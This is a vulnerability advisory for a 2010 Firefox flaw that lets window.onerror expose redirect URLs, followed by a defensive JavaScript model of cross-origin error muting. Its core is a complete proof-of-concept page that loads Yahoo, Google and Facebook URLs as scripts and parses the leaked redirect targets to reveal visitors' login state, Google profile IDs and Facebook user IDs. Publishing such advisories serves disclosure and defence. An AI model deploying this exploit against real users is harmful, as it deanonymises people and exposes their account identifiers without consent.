Firefox Error Handling Information Disclosure Vulnerability
Release date: 2010-05-27
Updated: 2010-05-28
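Affected systems:
Mozilla Firefox 3.6.3
Mozilla Firefox 3.5.9
Description:
BUGTRAQ ID: 40401
Firefox is a very popular open-source web browser.
Firefox's window.onerror handler allows the target URL of a redirect to be read. If a site that redirects is referenced through an HTML <script> tag, the session-specific query parameters contained in the target URL can be read.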
<*Source: Soroush Dalili (Irsdl@yahoo.com)
Links: http://secunia.com/advisories/39925/
http://soroush.secproject.com/blog/2010/05/cross-site-url-hijacking-by-using-error-object-in-mozilla-firefox/
*>
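Test method:
WARNING
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!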
<br/>
Tested Platform: This technique has been tested on Mozilla Firefox 3.6.3, 3.5.9, 3.6.4build4.
<br/>
Blog: <a href="http://soroush.secproject.com/blog/">Click Here</a>
<br/>
Mirror Blog: <a href="http://irsdl1.wordpress.com">Click Here</a>
<br/><hr/>
1. Which Version of Yahoo Mail Are You Currently Using: <b><font color="#00FF11"><span id="yahooresult"></span></font></b>
<br/>
2. What Is Your Profile ID in Google.com: <b><font color="#7777FF"><span id="googleresult"></span></font></b>
<br/>
3. What Is Your Facebook User ID If You Play Farmville: <b><font color="#0077FF"><span id="fbresult"></span></font></b>
<br/>
<script>
window.onerror=fnErrorTrap;
function fnErrorTrap(sMsg,sUrl,sLine){
    var msg = '';
    sUrl = unescape(sUrl);
    if(sUrl.indexOf('yahoo')>0) // Yahoo
    {
        if(sUrl.indexOf('/dc/')>0)
            msg = 'You Are Using New Version of Yahoo Mail!';
        else if(sUrl.indexOf('/mc/')>0)
            msg = 'You Are Using Old Version of Yahoo Mail!';
        else
            msg = 'You Are Not Logged-in in Yahoo Mail!';
        document.getElementById('yahooresult').innerHTML = msg;
    }
    else if(sUrl.indexOf('google')>0) //Google
    {
        if(sUrl.indexOf('/ServiceLogin')>0)
            msg = 'You Are Not Logged-in in Google.com!';
        else if(sUrl.indexOf('/editprofile')>0)
            msg = 'You Are Logged-in in Google.com But You Do Not Have Any Profile!';
        else if(sUrl.indexOf('/profiles/')>0)
            msg = 'Your Profile ID In Google.com Is: '+sUrl.substring(sUrl.lastIndexOf('/')+1);
        else
            msg = 'You Are Logged-in in Google But I Cannot Find Your Profile ID!!!';
        document.getElementById('googleresult').innerHTML = msg;
    }else // Facebook
    {
        if(sUrl.indexOf('login.php')>0)
            msg = 'You Are Not Logged-in in Facebook!';
        else if(sUrl.indexOf('tos.php')>0)
            msg = 'WoW! You Do Not Play Farmville?!!';
        else if(sUrl.indexOf('xd_receiver.htm')>0)
        {
            var temp = sUrl.substring(sUrl.indexOf('uid":'));
            msg = 'Your Facebook User ID Is: '+temp.substring(5,temp.indexOf(','));
        }
        else
            msg = 'I Cannot Get The Point!';
        document.getElementById('fbresult').innerHTML = msg;
    }
    return false;
}
if(!(/Firefox[\/\s](\d+\.\d+)/.test(navigator.userAgent)))
    alert('Please use Mozilla Firefox');
else
{
    document.write('<script src="http://mail.yahoo.com/"><\/script>');
    document.write('<script src="http://www.google.com/profiles/me"><\/script>');
    document.write('<script src="http://www.facebook.com/login.php?return_session=1&nochrome=1&fbconnect=1&extern=2&display=popup&api_key=80c6ec6628efd9a465dd223190a65bbc&v=1.0&next=http://www.farmville.com/xd_receiver.htm"><\/script>');
}
</script>
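Recommendation:
Vendor patch:
Mozilla
-------
The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:
http://www.mozilla.org/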
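Added example (not part of the original advisory and not Mozilla's code): a small JavaScript model of how a browser can mute error details for a cross-origin script load before calling window.onerror, which is why current browsers report only "Script error." for cross-origin scripts loaded without CORS. The function names, the redirect-chain representation and the example hosts are assumptions made for illustration.

```javascript
// Added illustration: decide what window.onerror(msg, url, line) may see
// for a <script> loaded without CORS. All hosts below are constructed.

// Origin = scheme + host + port, as computed by the WHATWG URL parser.
function originOf(url) {
  return new URL(url).origin;
}

// A no-CORS script load is tainted if any hop of its redirect chain
// (the first request included) leaves the including document's origin.
function isTainted(documentUrl, redirectChain) {
  const docOrigin = originOf(documentUrl);
  return redirectChain.some((hop) => originOf(hop) !== docOrigin);
}

// rawError is what the script engine produced internally.
function onerrorArgs(documentUrl, redirectChain, rawError) {
  if (isTainted(documentUrl, redirectChain)) {
    // Muted: no message text, no post-redirect URL, no line number.
    return { msg: 'Script error.', url: '', line: 0 };
  }
  const finalUrl = redirectChain[redirectChain.length - 1];
  return { msg: rawError.msg, url: finalUrl, line: rawError.line };
}

// Constructed sample data: the including page and three redirect chains.
const page = 'http://attacker.example/poc.html';
const rawError = { msg: 'syntax error', line: 1 };
const chains = {
  // Cross-site include whose redirect target carries a per-user ID.
  cross: ['http://victim.example/profiles/me',
          'http://victim.example/profiles/1234567890'],
  // Same-origin script that redirects within the same origin.
  same: ['http://attacker.example/js/app.js',
         'http://attacker.example/js/app.v2.js'],
  // Same-origin URL that bounces to another origin: still tainted.
  mixed: ['http://attacker.example/go',
          'http://victim.example/mail/?sid=constructed'],
};

function demo() {
  const out = {};
  for (const [name, chain] of Object.entries(chains)) {
    out[name] = onerrorArgs(page, chain, rawError);
  }
  return out;
}
console.log(demo());
```

Only the same-origin chain yields a usable URL and line number; the other two chains reach the handler with an empty URL, so the redirect target never becomes visible to the including page.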
